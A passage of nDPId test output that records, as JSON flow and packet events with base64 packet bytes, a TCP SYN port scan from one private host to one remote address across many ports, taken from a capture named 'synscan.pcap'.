-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsHAEAADUG93GsEAAIQA2GNIzSBCTdUoMYAAAAAGACCAAsawAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/AsAADIGGmesEAAIQA2GNIzSCdrdUoMYAAAAAGACDAAitQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsgb0AADIGlLWsEAAIQA2GNIzSB\/7dUoMYAAAAAGACDAAkkQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAssgsAAC4GaGesEAAIQA2GNIzSDZTdUoMYAAAAAGACDAAe+wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAspfEAACcGe4GsEAAIQA2GNIzSCvvdUoMYAAAAAGACEAAdlAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsV3wAADYGuvasEAAIQA2GNIzSECHdUoMYAAAAAGACDAAcbgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsJLYAADoG6bysEAAIQA2GNIzSPoHdUoMYAAAAAGACDADuDQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAs2BIAADkGN2CsEAAIQA2GNIzSB9HdUoMYAAAAAGACCAAovgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsipYAACcGltysEAAIQA2GNIzSFf\/dUoMYAAAAAGACEAASkAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058781,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058781,"pkt":"ACYLMQczACWzv5HuCABFAAAs7gYAACcGM2ysEAAIQA2GNIzSDvPdUoMYAAAAAGACEAAZnAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058781,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058781,"pkt":"ACYLMQczACWzv5HuCABFAAAssBUAADsGXV2sEAAIQA2GNIzSDuHdUoMYAAAAAGACEAAZrgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsB84AADoGBqWsEAAIQA2GNIzTF0vdU4MZAAAAAGACDAAVQQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs9uYAADUGHIysEAAIQA2GNIzTTv7dU4MZAAAAAGACCADhjQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsaisAAC8Gr0esEAAIQA2GNIzTu9DdU4MZAAAAAGACEABsuwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsoicAADgGbkusEAAIQA2GNIzTB+TdU4MZAAAAAGACBAAsqAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs5qoAADYGK8isEAAIQA2GNIzTE9jdU4MZAAAAAGACDAAYtAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsswIAACsGanCsEAAIQA2GNIzTFGXdU4MZAAAAAGACEAAUJwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs+xQAACsGIl6sEAAIQA2GNIzTDpndU4MZAAAAAGACEAAZ8wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsrwkAAC8GammsEAAIQA2GNIzTDaXdU4MZAAAAAGACEAAa5wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAseJEAADcGmOGsEAAIQA2GNIzTD6bdU4MZAAAAAGACEAAY5gAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAse3UAADsGkf2sEAAIQA2GNIzTzoXdU4MZAAAAAGACEABaBgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/eEAAC0GHZGsEAAIQA2GNIzTEyPdU4MZAAAAAGACCAAdaQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsro4AACgGceSsEAAIQA2GNIzSrdXdUoMYAAAAAGACBACGuQAAAgQFtA=="} 
-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsChEAACcGF2KsEAAIQA2GNIzSAAndUoMYAAAAAGACEAAohgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
